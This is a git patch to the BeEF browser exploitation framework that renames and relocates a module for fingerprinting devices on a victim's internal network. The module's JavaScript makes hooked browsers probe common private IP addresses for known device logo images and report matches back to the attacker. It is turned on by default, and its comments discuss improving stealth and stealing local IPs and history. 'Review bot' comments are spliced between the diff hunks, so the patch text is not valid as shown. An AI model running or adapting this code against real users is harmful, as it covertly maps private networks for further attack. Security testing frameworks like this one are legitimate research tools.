From 66a90cac76ffc4f0760e58b20c34649d44b959e2 Mon Sep 17 00:00:00 2001
From: antisnatchor
Date: Thu, 19 May 2011 12:02:23 +0000
Subject: [PATCH] moved and renamed the Yokoso-like module to recon -> InternalNetworkFingerprinting
git-svn-id: https://beef.googlecode.com/svn/trunk@978 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 .../network/detect_local_settings/config.yaml | 11 +--
 .../fingerprint_local_network.rb | 70 -------------------
 .../command.js} | 9 ++-
 .../config.yaml | 11 +++
 .../internal_network_fingerprinting/module.rb | 60 ++++++++++++++++
 5 files changed, 79 insertions(+), 82 deletions(-)
 delete mode 100644 modules/network/detect_local_settings/fingerprint_local_network.rb
 rename modules/{network/detect_local_settings/fingerprint_local_network.js => recon/internal_network_fingerprinting/command.js} (86%)
 create mode 100644 modules/recon/internal_network_fingerprinting/config.yaml
 create mode 100644 modules/recon/internal_network_fingerprinting/module.rb
diff --git a/modules/network/detect_local_settings/config.yaml b/modules/network/detect_local_settings/config.yaml
index 5970ed7c4..5a320b3ec 100644
--- a/modules/network/detect_local_settings/config.yaml
+++ b/modules/network/detect_local_settings/config.yaml
@@ -8,13 +8,4 @@ beef:
 authors: ["pdp", "wade", "bm"]
 target:
 working: ["FF", "C"]
- not_working: ["IE"]
- fingerprint_local_network:
- enable: false
- category: "Network"
- name: "Fingerprint local network"
- description: "Scan common local network IP addresses for embedded devices."
- authors: ["bcoles@gmail.com", "wade"]
- target:
- user_notify: ["FF", "IE"]
- not_working: ["O"]
+ not_working: ["IE"]
\ No newline at end of file
diff --git a/modules/network/detect_local_settings/fingerprint_local_network.rb b/modules/network/detect_local_settings/fingerprint_local_network.rb
deleted file mode 100644
index 1262b7e62..000000000
--- a/modules/network/detect_local_settings/fingerprint_local_network.rb
+++ /dev/null
@@ -1,70 +0,0 @@
-module BeEF
-module Modules
-module Commands
-#
-# Fingerprint local network module
-# This module attempts to fingerprint embedded devices within the zombies'
-# local network. It does this by loading images on common local network
-# IP addresses then matching the image width, height and path to those
-# for a known device.
-#
-# TODO #
-#
-# Add IPv6 support
-# Add HTTPS support
-# - Devices with invalid certs are blocked by IE and FF by default
-# Improve stealth
-# - Load images with CSS "background:" CSS to avoid http auth login popups
-# Improve speed
-# - Make IP addresses a user-configurable option rather than a hard-coded list
-# - Detect local ip range first - using browser history and/or with java
-# - History theft via CSS history is patched in modern browsers.
-# - Local IP theft with Java is slow and may fail
-
-class Fingerprint_local_network < BeEF::Core::Command
- def initialize
- super({
- 'Name' => 'Fingerprint local network',
- 'Description' => 'Scan common local network IP addresses for embedded devices.',
- 'Category' => 'Network',
- 'Author' => ['bcoles@gmail.com', 'wade'],
- 'File' => __FILE__
- })
- # Doesn't work in FF4 (but works in 3.x)
- set_target({
- 'verified_status' => VERIFIED_USER_NOTIFY,
- 'browser_name' => FF
- })
- set_target({
- 'verified_status' => VERIFIED_NOT_WORKING,
- 'browser_name' => O
- })
- set_target({
- 'verified_status' => VERIFIED_USER_NOTIFY,
- 'browser_name' => IE
- })
- use_template!
- end
- def callback
- content = {}
- content['device'] =@datastore['device'] if not @datastore['device'].nil?
- content['url'] = @datastore['url'] if not @datastore['url'].nil?
- if content.empty?
- content['fail'] = 'Did not detect any local network devices'
- end
- save content
- end
-
-end
-
-end
-end
-end
-
diff --git a/modules/network/detect_local_settings/fingerprint_local_network.js b/modules/recon/internal_network_fingerprinting/command.js
similarity index 86%
rename from modules/network/detect_local_settings/fingerprint_local_network.js
rename to modules/recon/internal_network_fingerprinting/command.js
index c9ebbecc3..0a64d9551 100644
--- a/modules/network/detect_local_settings/fingerprint_local_network.js
+++ b/modules/recon/internal_network_fingerprinting/command.js
@@ -1,6 +1,7 @@
 beef.execute(function() {
 var dom = document.createElement('b');
+
 var ips = [
 'http://192.168.0.1',
 'http://192.168.0.100',
@@ -15,7 +16,8 @@ beef.execute(function() {
 'http://192.168.100.1',
 'http://192.168.100.254',
 'http://192.168.123.1',
- 'http://192.168.123.254'
+ 'http://192.168.123.254',
+ 'http://192.168.10.1'
 ];
 var urls = new Array(
 new Array("QNAP NAS",":8080","/ajax_obj/img/running.gif",16,16),
@@ -29,8 +31,10 @@ beef.execute(function() {
 new Array("Cisco IP Phone",":80","/Images/Logo",120,66),
 new Array("Snom Phone",":80","/img/snom_logo.png",168,62),
 new Array("Brother Printer",":80","/pbio/brother.gif",144,52),
- new Array("HP LaserJet",":80","/hp/device/images/logo.gif",42,27)
+ new Array("HP LaserJet",":80","/hp/device/images/logo.gif",42,27),
+ new Array("JBoss Application server",":8080","/images/logo.gif",226,105)
 );
+ //console.log("Array loaded [" + urls + "]");
 // for each ip
 for(var i=0; i < ips.length; i++) {
@@ -38,6 +42,7 @@ beef.execute(function() {
 // for each url
 for(var u=0; u < urls.length; u++) {
 var img = new Image;
+ //console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]");
 img.id = u;
 img.src = ips[i]+urls[u][1]+urls[u][2];
 //img.title = ips[i]+urls[u][1];
diff --git a/modules/recon/internal_network_fingerprinting/config.yaml b/modules/recon/internal_network_fingerprinting/config.yaml
new file mode 100644
index 000000000..bedc47c43
--- /dev/null
+++ b/modules/recon/internal_network_fingerprinting/config.yaml
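Review bot: The added `//console.log("Array loaded [" + urls + "]");` line, and the `//console.log("Detecting [" + urls[u][0] + "] at IP [" + ips[i] + "]");` line in the following hunk, are commented-out debug statements committed as dead code; either delete them or route a single real log call through a debug flag, rather than leaving toggled-off lines for the next person to uncomment. The `urls` table that the `new Array("JBoss Application server",":8080","/images/logo.gif",226,105)` entry extends is a positional 5-tuple whose column meaning is only stated in the Ruby file's header comment, so a one-line comment above `var urls = new Array(` such as `// [name, port, image path, width, height]` would make the signature table self-describing. Both `for` loops enclosing these lines start and end outside the hunks.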
@@ -0,0 +1,11 @@
+beef:
+ module:
+ internal_network_fingerprinting:
+ enable: true
+ category: "Recon"
+ name: "Internal Network Fingerprinting"
+ description: "Discover devices and applications in the internal network of the victim using signatures like default logo images/favicons (partially based on the Yokoso idea)"
+ authors: ["bcoles@gmail.com", "wade", "antisnatchor"]
+ target:
+ user_notify: ["FF", "IE"]
+ not_working: ["O"]
diff --git a/modules/recon/internal_network_fingerprinting/module.rb b/modules/recon/internal_network_fingerprinting/module.rb
new file mode 100644
index 000000000..678e75526
--- /dev/null
+++ b/modules/recon/internal_network_fingerprinting/module.rb
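Review bot: `enable: true` turns the module on by default, while the entry this commit removes from modules/network/detect_local_settings/config.yaml had `enable: false`; if the flip is deliberate it should be called out in the commit message, since the module header itself notes that loading the probe images can trigger HTTP-auth login popups in the hooked browser, which is presumably why the FF and IE targets stay at `user_notify`. The `name`, `description`, `category` and `authors` values here are also repeated verbatim in the `super({...})` hash of module.rb, so the two copies will drift unless one is declared the source of truth; a short comment on one of them stating which wins would be enough.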
@@ -0,0 +1,60 @@
+#
+# Internal Network Fingerprinting
+# Discover devices and applications in the internal network of the victim using
+# signatures like default logo images/favicons (partially based on the Yokoso idea).
+# It does this by loading images on common/predefined local network
+# IP addresses then matching the image width, height and path to those
+# for a known device.
+#
+# TODO LIST
+# Add IPv6 support
+# Add HTTPS support
+# - Devices with invalid certs are blocked by IE and FF by default
+# Improve stealth
+# - Load images with CSS "background:" CSS to avoid http auth login popups
+# Improve speed
+# - Make IP addresses a user-configurable option rather than a hard-coded list
+# - Detect local ip range first - using browser history and/or with java
+# - History theft via CSS history is patched in modern browsers.
+# - Local IP theft with Java is slow and may fail
+
+class Internal_network_fingerprinting < BeEF::Core::Command
+ def initialize
+ super({
+ 'Name' => 'Internal Network Fingerprinting',
+ 'Description' => 'Discover devices and applications in the internal network of the victim using signatures like default logo images/favicons (partially based on the Yokoso idea)',
+ 'Category' => 'Recon',
+ 'Author' => ['bcoles@gmail.com', 'wade', 'antisnatchor'],
+ 'File' => __FILE__
+ })
+
+ set_target({
+ 'verified_status' => VERIFIED_USER_NOTIFY,
+ 'browser_name' => FF # works also in FF 4.0.1
+ })
+
+ set_target({
+ 'verified_status' => VERIFIED_NOT_WORKING,
+ 'browser_name' => O
+ })
+
+ set_target({
+ 'verified_status' => VERIFIED_USER_NOTIFY,
+ 'browser_name' => IE
+ })
+
+ use_template!
+ end
+
+ def callback
+ content = {}
+ content['device'] =@datastore['device'] if not @datastore['device'].nil?
+ content['url'] = @datastore['url'] if not @datastore['url'].nil?
+ if content.empty?
+ content['fail'] = 'No devices/applications have been discovered.'
+ end
+ save content
+ end
+end
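Review bot: `class Internal_network_fingerprinting < BeEF::Core::Command` is defined at top level here, whereas the deleted fingerprint_local_network.rb wrapped its class in `module BeEF`, `module Modules`, `module Commands`; unless the recon loader evaluates module.rb inside that namespace, the class now lands on Object, which is worth confirming before anything relies on the constant path. In `callback`, `content['device'] =@datastore['device'] if not @datastore['device'].nil?` and the `url` line below it would read more idiomatically as `content['device'] = @datastore['device'] unless @datastore['device'].nil?` (space after `=`, `unless` instead of `if not`). Both values are reported back by the hooked browser and handed to `save content` without any validation or length cap, so whatever renders the stored result must treat them as untrusted; a comment above `def callback`, e.g. `# device and url are supplied by the hooked browser and are stored unvalidated`, would make that contract explicit.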